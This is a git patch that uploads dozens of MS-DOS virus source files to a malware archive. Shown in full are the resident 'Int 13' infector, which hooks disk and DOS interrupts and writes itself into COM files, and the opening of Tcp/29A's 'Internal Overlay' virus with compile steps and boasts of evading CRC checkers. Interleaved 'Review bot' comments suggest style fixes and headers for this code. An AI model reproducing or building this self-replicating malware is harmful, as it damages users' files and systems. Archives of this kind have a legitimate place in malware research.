From a2f096eccccce37690eaa11fce951b049ddb727e Mon Sep 17 00:00:00 2001 
From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Tue, 12 Jan 2021 17:47:04 -0600 Subject: [PATCH] Add files via upload --- MSDOS/Virus.MSDOS.Unknown.int10.asm | 47 + MSDOS/Virus.MSDOS.Unknown.int13.asm | 310 +++++ MSDOS/Virus.MSDOS.Unknown.inter.asm | Bin 0 -> 1792 bytes MSDOS/Virus.MSDOS.Unknown.intovl.asm | 451 ++++++++ MSDOS/Virus.MSDOS.Unknown.intr1440.asm | 771 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.intr1988.asm | 805 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.intruder.asm | 710 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.intrview.asm | 82 ++ MSDOS/Virus.MSDOS.Unknown.inv-evil.asm | 331 ++++++ MSDOS/Virus.MSDOS.Unknown.inv602-r.asm | 86 ++ MSDOS/Virus.MSDOS.Unknown.invdanub.asm | 1196 ++++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.invol.asm | 563 +++++++++ MSDOS/Virus.MSDOS.Unknown.iod.asm | 350 ++++++ MSDOS/Virus.MSDOS.Unknown.ir144.asm | 123 ++ MSDOS/Virus.MSDOS.Unknown.irm_kill.asm | 295 +++++ MSDOS/Virus.MSDOS.Unknown.israeli.asm | 753 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.isreali.asm | 882 +++++++++++++++ MSDOS/Virus.MSDOS.Unknown.isreali.lst | 882 +++++++++++++++ MSDOS/Virus.MSDOS.Unknown.ital.asm | 454 ++++++++ MSDOS/Virus.MSDOS.Unknown.italiano.asm | 455 ++++++++ MSDOS/Virus.MSDOS.Unknown.itti-a.asm | 124 ++ MSDOS/Virus.MSDOS.Unknown.itti-b.asm | 96 ++ MSDOS/Virus.MSDOS.Unknown.ivdetect.asm | 143 +++ MSDOS/Virus.MSDOS.Unknown.ivkiller.asm | 479 ++++++++ MSDOS/Virus.MSDOS.Unknown.j_1808.asm | 583 ++++++++++ MSDOS/Virus.MSDOS.Unknown.j_1808.lst | 583 ++++++++++ MSDOS/Virus.MSDOS.Unknown.j_a204.asm | 977 ++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.j_sundyb.asm | 727 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.j_sundyb.lst | 727 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.jacky.asm | 1148 +++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru-b.asm | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru-b.lst | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru-s.asm | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru-s.lst | 794 +++++++++++++ 
MSDOS/Virus.MSDOS.Unknown.jeru.asm | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru.lst | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jerub204.asm | 977 ++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.jerus.asm | 797 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jerusal.asm | 720 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.jerusale.asm | 790 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jerusalm.asm | 797 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jo1_11.asm | 429 +++++++ MSDOS/Virus.MSDOS.Unknown.jo_v111.asm | 429 +++++++ MSDOS/Virus.MSDOS.Unknown.john.asm | 459 ++++++++ MSDOS/Virus.MSDOS.Unknown.johnb.asm | 484 ++++++++ MSDOS/Virus.MSDOS.Unknown.joker.asm | 541 +++++++++ MSDOS/Virus.MSDOS.Unknown.joshua.asm | 484 ++++++++ MSDOS/Virus.MSDOS.Unknown.justice.asm | 335 ++++++ MSDOS/Virus.MSDOS.Unknown.k-cmos.asm | 1118 ++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.kak.txt | 71 ++ MSDOS/Virus.MSDOS.Unknown.kbm.asm | 253 +++++ MSDOS/Virus.MSDOS.Unknown.keeper.asm | 483 ++++++++ MSDOS/Virus.MSDOS.Unknown.key-fake.asm | 247 ++++ MSDOS/Virus.MSDOS.Unknown.keypress.asm | 739 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.keypress.err | 739 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.kiis.asm | 269 +++++ MSDOS/Virus.MSDOS.Unknown.kildia.asm | 541 +++++++++ MSDOS/Virus.MSDOS.Unknown.killeddi.asm | 654 +++++++++++ MSDOS/Virus.MSDOS.Unknown.kilroy.asm | 315 ++++++ MSDOS/Virus.MSDOS.Unknown.kinison.asm | 420 +++++++ MSDOS/Virus.MSDOS.Unknown.kinnison.asm | 397 +++++++ MSDOS/Virus.MSDOS.Unknown.kode4-1.asm | 94 ++ MSDOS/Virus.MSDOS.Unknown.kode4-2.asm | 185 +++ MSDOS/Virus.MSDOS.Unknown.kode4.asm | 100 ++ MSDOS/Virus.MSDOS.Unknown.kode4v2.asm | 191 ++++ MSDOS/Virus.MSDOS.Unknown.krad.pas | 137 +++ MSDOS/Virus.MSDOS.Unknown.krautfresser.asm | 110 ++ MSDOS/Virus.MSDOS.Unknown.kuku.bas | 102 ++ MSDOS/Virus.MSDOS.Unknown.lacimehc.asm | 260 +++++ MSDOS/Virus.MSDOS.Unknown.laicos.asm | 193 ++++ MSDOS/Virus.MSDOS.Unknown.lame.asm | 186 +++ MSDOS/Virus.MSDOS.Unknown.lb-349.asm | 319 ++++++ 
MSDOS/Virus.MSDOS.Unknown.lbrother.asm | 242 ++++ MSDOS/Virus.MSDOS.Unknown.leap.asm | 280 +++++ MSDOS/Virus.MSDOS.Unknown.leap_frg.asm | 278 +++++ MSDOS/Virus.MSDOS.Unknown.leech.asm | 498 ++++++++ MSDOS/Virus.MSDOS.Unknown.lehigh.asm | 315 ++++++ MSDOS/Virus.MSDOS.Unknown.lemming.asm | 1125 ++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.lepc.asm | 297 +++++ MSDOS/Virus.MSDOS.Unknown.leprosy-c.asm | 217 ++++ MSDOS/Virus.MSDOS.Unknown.leprosy.c | 216 ++++ MSDOS/Virus.MSDOS.Unknown.leprosyb.asm | 242 ++++ MSDOS/Virus.MSDOS.Unknown.leprosyc.asm | 297 +++++ MSDOS/Virus.MSDOS.Unknown.liana.asm | 473 ++++++++ MSDOS/Virus.MSDOS.Unknown.liberty2.asm | 1194 +++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.liberty2.lst | 1194 +++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.libertyb.asm | 1194 +++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.libertyb.lst | 1194 +++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.lisa.asm | 192 ++++ MSDOS/Virus.MSDOS.Unknown.lisbon2.asm | 331 ++++++ MSDOS/Virus.MSDOS.Unknown.little.asm | 153 +++ MSDOS/Virus.MSDOS.Unknown.lizard.asm | 626 ++++++++++ MSDOS/Virus.MSDOS.Unknown.lmd-2000.asm | 587 ++++++++++ MSDOS/Virus.MSDOS.Unknown.loader.asm | 111 ++ MSDOS/Virus.MSDOS.Unknown.locate.asm | 231 ++++ MSDOS/Virus.MSDOS.Unknown.lock.asm | 145 +++ MSDOS/Virus.MSDOS.Unknown.lockjaw.asm | 561 +++++++++ MSDOS/Virus.MSDOS.Unknown.loki1237.asm | 613 ++++++++++ MSDOS/Virus.MSDOS.Unknown.lokjawd.asm | 559 +++++++++ 99 files changed, 48627 insertions(+) create mode 100644 MSDOS/Virus.MSDOS.Unknown.int10.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.int13.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.inter.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.intovl.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.intr1440.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.intr1988.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.intruder.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.intrview.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.inv-evil.asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.inv602-r.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.invdanub.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.invol.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.iod.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ir144.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.irm_kill.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.israeli.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.isreali.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.isreali.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.ital.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.italiano.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.itti-a.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.itti-b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ivdetect.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ivkiller.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.j_1808.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.j_1808.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.j_a204.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.j_sundyb.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.j_sundyb.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.jacky.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru-b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru-b.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru-s.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru-s.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.jerub204.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jerus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jerusal.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jerusale.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jerusalm.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jo1_11.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jo_v111.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.john.asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.johnb.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.joker.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.joshua.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.justice.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.k-cmos.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kak.txt create mode 100644 MSDOS/Virus.MSDOS.Unknown.kbm.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.keeper.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.key-fake.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.keypress.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.keypress.err create mode 100644 MSDOS/Virus.MSDOS.Unknown.kiis.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kildia.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.killeddi.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kilroy.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kinison.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kinnison.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kode4-1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kode4-2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kode4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kode4v2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.krad.pas create mode 100644 MSDOS/Virus.MSDOS.Unknown.krautfresser.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kuku.bas create mode 100644 MSDOS/Virus.MSDOS.Unknown.lacimehc.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.laicos.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lame.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lb-349.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lbrother.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leap.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leap_frg.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leech.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lehigh.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lemming.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lepc.asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.leprosy-c.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leprosy.c create mode 100644 MSDOS/Virus.MSDOS.Unknown.leprosyb.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leprosyc.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.liana.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.liberty2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.liberty2.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.libertyb.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.libertyb.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.lisa.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lisbon2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.little.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lizard.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lmd-2000.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.loader.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.locate.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lock.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lockjaw.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.loki1237.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lokjawd.asm diff --git a/MSDOS/Virus.MSDOS.Unknown.int10.asm b/MSDOS/Virus.MSDOS.Unknown.int10.asm new file mode 100644 index 00000000..f29e3bc1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.int10.asm 
@@ -0,0 +1,47 @@
+DOSCALL SEGMENT 'CODE'
+ ASSUME CS:DOSCALL,DS:DOSCALL
+;
+;Procedure DOSVIO(VAR: AX, BX, CX, DX: Word);
+;
+; Issue a DOS VIDEO I/O INT (10) with register values set by caller
+;
+; FRAME: ADR AX; 12
+; ADR BX; 10
+; ADR CX; 08
+; ADR DX; 06
+; ; 00
+;
+ PUBLIC DOSVIO
+DOSVIO PROC FAR
+ PUSH BP ;Save current BP value
+ MOV BP,SP ;To address parms
+ MOV DI,[BP+12] ;Address of AX
+ MOV AX,[DI] ;Set AX value
+ MOV DI,[BP+10] ;Address of BX
+ MOV BX,[DI] ;Set BX value
+ MOV DI,[BP+08] ;Address of CX
+ MOV CX,[DI] ;Set CX value
+ MOV DI,[BP+06] ;Address of DX
+ MOV DX,[DI] ;Set DX value
+
+ INT 10H ;Call BIOS with caller's AX, BX, CX, DX
+
+ MOV DI,[BP+12] ;Now put them all back...
+ MOV [DI],AX
+ MOV DI,[BP+10]
+ MOV [DI],BX
+ MOV DI,[BP+08]
+ MOV [DI],CX
+ MOV DI,[BP+06]
+ MOV [DI],DX
+
+ POP BP ;Restore frame pointer
+ RET 6 ;Return, poping 6 bytes
+
+DOSVIO ENDP
+
+DOSCALL ENDS
+ END
+
+*** CREATED 06/28/82 21:05:48 BY AMD ***
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.int13.asm b/MSDOS/Virus.MSDOS.Unknown.int13.asm
new file mode 100644
index 00000000..756fc610
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.int13.asm
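Review bot: `RET 6` at the end of DOSVIO discards 6 bytes of arguments, but the frame comment and the loads from `[BP+06]` through `[BP+12]` show four 2-byte pointer arguments, i.e. 8 bytes, so one word would be left on the caller's stack after every call unless the caller's convention cleans it up itself, which the listing does not state; the form consistent with the frame is `RET 8`. A cataloguing point follows from the same lines: nothing here is a virus — it is a 1982 far-call shim that runs INT 10h with caller-supplied registers and copies the results back — yet it is committed as `Virus.MSDOS.Unknown.int10.asm`, and a header such as `; NOTE: benign BIOS video-call wrapper (DOSVIO), not malware; misfiled in this corpus` would stop signature extraction or dataset tooling treating it as a malicious sample. The `*** CREATED ... ***` line after `END` sits outside the assembled unit and should at least be commented.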
@@ -0,0 +1,310 @@
+Code Segment
+ Assume CS:Code
+
+Old13 = 9Ch
+True13 = 9Dh
+Saved21 = 9Eh
+Temp13 = 9Fh
+
+VStart: loop Next ; Virus ID
+Next: push ax
+ mov di,13h * 4
+ push di
+ xor bp,bp
+ mov ds,bp
+ les bx,[di]
+ mov di,True13 * 4
+ mov [di-4],bx
+ mov [di-2],es
+ mov ah,13h
+ int 2Fh
+ push es
+ push bx
+ int 2Fh
+ mov es,bp
+ mov si,21h * 4
+ pop ax
+ stosw
+ pop ax
+ stosw
+ push si
+ movsw
+ movsw
+ mov ah,52h
+ int 21h
+ push es
+ pop ds
+ les ax,[bx+12h] ; ax is now 0000h, i.e. ah is 0.
+ push word ptr es:[bp+2]
+ mov si,100h
+ mov cx,si
+ mov di,bp
+ push si
+ rep movs word ptr es:[di], cs:[si]
+ pop si
+ pop word ptr ds:[bx+14h]
+ push es
+ mov al, offset Continue ; Let's use it!
+ push ax
+ retf
+
+SavedCX dw 1
+SavedDX dw 0
+SavedBX dw 0
+SavedES dw 0
+
+FileWord dw 0
+
+SCX = offset SavedCX - offset VStart
+SDX = offset SavedDX - offset VStart
+
+Continue: mov es,bp
+ pop di
+ mov al,offset Int21 ; Two times!
+ stosw
+ mov es:[di],cs
+ pop di
+ mov al,offset Int13 ; Three times!
+ stosw
+ mov es:[di],cs
+
+ mov es,[bp+2Ch] ; This assumes SS:
+ mov di,bp
+ xchg ax,bp
+ dec cx
+ScanEnv: repne scasb
+ scasb
+ jnz ScanEnv
+ scasw
+ push es
+ pop ds
+ mov dx,di
+ mov ah,3Dh
+ int 21h
+ jc NoStart
+ mov dx,si
+ xchg ax,bx
+ mov ah,3Fh
+ push ss
+ pop ds
+ int 21h
+ mov ah,3Eh
+ int 21h
+
+ pop ax
+ push ss
+ push si
+ push ss
+ pop es
+ retf
+
+NoStart: mov ah,4Ch
+ int 21h
+
+Int13V: mov SavedBX,bx
+ mov SavedCX,cx
+ mov SavedDX,dx
+ mov SavedES,es
+
+Go13: int Old13
+ jmp short RetF2
+
+Int13: cmp ah,2
+ jne Go13
+ push ds
+ push si
+ push di
+ push cx
+ push dx
+ push es
+ push bx
+ push dx
+ int Old13
+ pop dx
+ jc Exit13
+ cmp word ptr es:[bx],00E2h
+ clc
+ jne Exit13
+ mov ax,202h
+ mov cx,es:[bx+SCX]
+ mov dh,byte ptr es:[bx+SDX+1]
+ mov bx,0B800h
+ mov ds,bx
+ mov es,bx
+ mov bh,78h
+ int True13
+ jc Exit13
+ mov si,7A00h
+ pop bx
+ mov di,bx
+ pop es
+ mov cx,100h
+ rep movsw
+ jmp short Exit13_1
+Exit13: pop bx
+ pop es
+Exit13_1: pop dx
+ pop cx
+ pop di
+ pop si
+ pop ds
+RetF2: retf 2
+
+Int21: cmp ah,12h
+ je FindNext
+ int Saved21
+ jmp RetF2
+FindNext: int Saved21
+ cmp al,0
+ jnz RetF2
+ push ax
+ push bx
+ push ds
+ push es
+ mov ah,2Fh
+ int Saved21
+ push es
+ pop ds
+ mov ax,'MO'
+ cmp ax,[bx+17]
+ jne Exit1
+ cmp ax,[bx+9]
+ je Exit1
+ mov al,[bx+7]
+ add al,'@'
+ push cx
+ push dx
+ mov cx,[bx+36]
+ mov dx,200h
+ cmp cx,dx
+ jb Exit2
+ dec cx
+ test ch,10b
+ jz Infect
+ cmp al,'C'
+ jb Exit2
+ test ch,100b
+ jz Infect
+Exit2: pop dx
+ pop cx
+Exit1: pop es
+ pop ds
+ pop bx
+ pop ax
+ jmp RetF2
+
+Infect: push si
+ push di
+ push cs
+ pop es
+ mov di,dx
+ lea si,[bx+8]
+ mov ah,':'
+ stosw
+ movsw
+ movsw
+ movsw
+ movsw
+ mov al,'.'
+ stosb
+ movsw
+ movsb
+ xor ax,ax
+ stosb
+
+ mov ds,ax
+ mov es,ax
+ mov si,13h * 4
+ mov di,Temp13 * 4
+
+ push si
+ push di
+ push es
+
+ movsw
+ movsw
+
+ mov word ptr [si-4], offset Int13V
+ mov [si-2], cs
+
+ push cs
+ pop ds
+
+ mov ah,3Dh
+ int Saved21
+ xchg ax,bx
+ mov ax,4202h
+ mov cx,-1
+ mov dx,cx
+ int Saved21 ; DX must now be zero (.COM)
+Go: mov ah,3Fh
+ mov dl,offset FileWord
+ mov di,dx
+ neg cx ; mov cx,1
+ int Saved21
+ push [di-8]
+ push [di-6]
+ mov ax,4200h
+ xor cx,cx ; can it be inc cx ??
+ xor dx,dx
+ int Saved21
+ mov ah,3Fh
+ mov dx,di
+ mov cl,2
+ int Saved21
+ mov ax,[di]
+ pop dx
+ pop cx
+ cmp ax,00E2h
+ je Close
+ cmp ax,5A4Dh
+ je Close
+ mov ax,202h
+ push cx
+ push dx
+ mov bx,0B800h
+ mov es,bx
+ mov bh,78h
+ int True13
+ lds si,[di-4]
+ push di
+ mov di,7A00h
+ mov cx,100h
+ rep movsw
+ pop di
+ mov ax,302h
+ pop dx
+ pop cx
+ push cx
+ push dx
+ int True13
+ pop dx
+ pop cx
+ mov ax,301h
+ xchg cx,cs:[di-8]
+ xchg dx,cs:[di-6]
+ push cs
+ pop es
+ xor bx,bx
+ int True13
+Close: mov ah,3Eh
+ int Saved21
+
+ pop es
+ pop si
+ pop di
+
+ movs word ptr es:[di], es:[si]
+ movs word ptr es:[di], es:[si]
+
+ pop di
+ pop si
+ jmp Exit2
+
+VName db ' Int 13'
+
+VEnd label byte
+VLen = offset VEnd - offset VStart
+
+Code EndS
+ End VStart
\ No newline at end of file
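Review bot: The listing has no header comment at all — the only identifier is `VName db ' Int 13'`, with no origin, date, or statement of what the resident code hooks — and that is the first thing an analyst triaging this corpus entry needs. The hunk itself shows it: the INT 13h vector is copied into vector 9Ch (`Old13`), the handler returned by INT 2Fh/AH=13h into 9Dh (`True13`) and INT 21h into 9Eh (`Saved21`), the `Int13`/`Int21` routines are then installed in their place, and both the sector path (`cmp word ptr es:[bx],00E2h`) and the file path (`cmp ax,00E2h`) key on the first word being 00E2h, which appears to be what `loop Next` at `VStart` assembles to. I would state that in a header, e.g. `; Archival sample, origin unknown. Memory-resident; parks the original INT 13h/INT 21h handlers in vectors 9Ch-9Eh and hooks INT 13h (AH=2) and INT 21h (AH=12h); first-word marker 00E2h.`. Style: `0B800h`, `7A00h`, `78h` and the `[bx+7]`/`[bx+9]`/`[bx+17]`/`[bx+36]` offsets into the DTA returned by `mov ah,2Fh / int Saved21` are unnamed magic numbers, whereas the file already names its vectors with `Old13`..`Temp13`; the same treatment would make the buffer-segment and record-layout assumptions readable.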
diff --git a/MSDOS/Virus.MSDOS.Unknown.inter.asm b/MSDOS/Virus.MSDOS.Unknown.inter.asm new file mode 100644 index 0000000000000000000000000000000000000000..74dd4a02b0e44d6abab34f559dbe73caa013a3f2 GIT binary patch literal 1792 zcmcgtO>f&U4Bgp)|G-WJdg!GXvb4Lzhe5XJ#F=e*lH7b0Jq%lR+E!rb{{Ki>Qrsk% zdz#=l3Ptjfj}((Z_3QcY`}>!#2Y7x0ZRWT0syimy>^) zCK)|oMP4JQvIHR|#beNbRgfc;Rb8WmQfXNCO=r@?>?v%y;WPkdX;N0&SlT+#M>@~L z4}kZxkXbMwg}gi}%r7bE;;3+YNx`&7g}X}%o>l0yVqc}uo-JWa-yjrb;cG?l;!;Rb z!p}Xu;jWym05Z=5R4qN0$|#6)Vu))SNTPzT+LyNTf7%u+(ZUt;Oy!OBGh_oGwkLx8 zR3M3b)`UjgyKk|*nb9UAXCPg{s2uJjXh?Gt{RSCXNwauxX+N_0lFUb0amr^#IYFgK z-FLW%@UHL=`Sy`8C7M>bTS5Uo2*f?DtGW9 z@QtSgkVj6%Re@9S$-JPMLyA-e4jeDeV6bY{hA1Ewg%yqqYW`XYNuAGqa>8o9vk0Bl z;F9MO3@h8CR>0_2-l9`Op0RX65F-kL$hhXt2>t8)(lzbeJqij9 x@H6i<7;f53VT}Am44$71Kx--wH?XEKM*bp3_(vfOl7;?vm@G(>w{QN_`U|s+XaE2J literal 0 HcmV?d00001 diff --git a/MSDOS/Virus.MSDOS.Unknown.intovl.asm b/MSDOS/Virus.MSDOS.Unknown.intovl.asm new file mode 100644 index 00000000..e7387e60 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.intovl.asm 
@@ -0,0 +1,451 @@
+;
+; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
+; Internal Overlay ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
+; by Tcp/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
+; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
+; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
+;
+; Here you have a virus i wrote some time ago... an old but still pretty
+; interesting virus (anyway, ain't so old... one year or less :) Its pe-
+; culiarity consists in that it infects COM and EXE files without modi-
+; fying their headers! ;) In this way, it doesn't get detected under a
+; very large number of CRC checkers which just compare the first bytes
+; and the length of the files whose info it stores.
+;
+; Internal Overlay (IntOv for friends :) does this by inserting an over-
+; lay loader at the entry point of the files it infects, and the corres-
+; ponding overlay -the virus- at the end of the file, appended to the
+; infected file in the traditional way :)
+;
+; It infects, as i told before, COM and EXE files on execution (4b00h)
+; and opening (3dh), and it doesn't infect COMMAND.COM or EXEs with re-
+; location items in the entry point, unless this item is located in off-
+; set 7 (PkLited files have an item there) ;)
+;
+; Compiling instructions:
+;
+; tasm /m intov.asm
+; tlink intov.obj
+; exe2bin intov.exe intov.com
+
+
+assume cs:code,ds:code,ss:code,es:code
+org 0
+code segment
+
+_BYTES = ((end_vir-start)+(ov_part-start)+15)
+_PARAG = _BYTES/16
+
+start:
+
+delta_ofs equ word ptr $+1
+ mov si,100h ; Delta offset (precalc)
+ ; In dropper, 100h
+id_mark equ word ptr $+1
+ mov cx,'<>' ; Length to search for, it will be the
+ ; id mark: '<>'... why not? :)
+reloc_pkl equ word ptr $+1
+ mov bp,0000 ; For PkLite's relocation
+ mov es,ds:[2ch] ; es-> environment
+ xor ax,ax
+ xor di,di
+ repnz scasw ; Search for two consecutive zeros
+ ; Searching file name
+ inc di
+ inc di ; es:di -> file name
+ push cs
+ push ds
+ push es
+ push di
+ push ds
+
+ mov ax,ds
+ dec ax
+ mov es,ax ; MCB access
+ ; ES-> MCB
+ mov bx,es:[0003]
+ sub bx,_PARAG+1
+ pop es
+ mov ah,4ah
+ int 21h ; Free memory. If resident, doesn't return!
+ mov ah,48h
+ mov bx,_PARAG
+ int 21h ; Want some memory
+ mov es,ax
+ push cs
+ pop ds
+
+ mov cx,offset(ov_part)
+ push si
+ xor di,di
+ rep movsb ; Move it to reserved area
+ pop si
+ mov ax,offset(new_mcb)
+ push es
+ push ax
+ retf ; Jump to reserved area
+
+new_mcb:
+ push ds
+ pop es ; es:= old cs
+ pop dx
+ pop ds
+ mov ax,3d00h
+ int 21h ; Open the file
+ xchg bx,ax ; bx:=handle
+ push cs
+ pop ds
+long_high equ word ptr $+1
+ mov cx,0000
+long_low equ word ptr $+1
+ mov dx,offset(ov_part) ; For the dropper
+ mov ax,4200h
+ int 21h ; Get set in file
+ ; Point to 'overlay'
+ mov cx,offset(end_vir)
+ mov ah,3fh
+ mov dx,offset(ov_part)
+ int 21h ; Read the 'overlay'
+ mov ah,3eh ; We're up to here in the Entry Point
+
+;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+;³ Now, the virus overlay part ³
+;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+ov_part:
+ int 21h ; Close file
+ push si
+ push si
+ pop di
+ mov si,offset(original)
+ mov cx,offset(ov_part)
+ rep movsb ; Restore original code in memory
+ pop si
+ push cs
+ pop ax
+ dec ax
+ mov es,ax ; es-> MCB
+ mov word ptr es:[0001],8 ; O.S. block
+ mov ax,3521h ; Get and change int 21h
+ int 21h
+ mov ofs_int21,bx
+ mov seg_int21,es
+ mov ah,25h
+ mov dx,offset(int_21)
+ int 21h
+exec_host:
+ pop ds ; PSP
+ push si
+ xor ax,ax
+ xor bx,bx
+ xor cx,cx
+ xor dx,dx
+ xor bp,bp
+ xor si,si
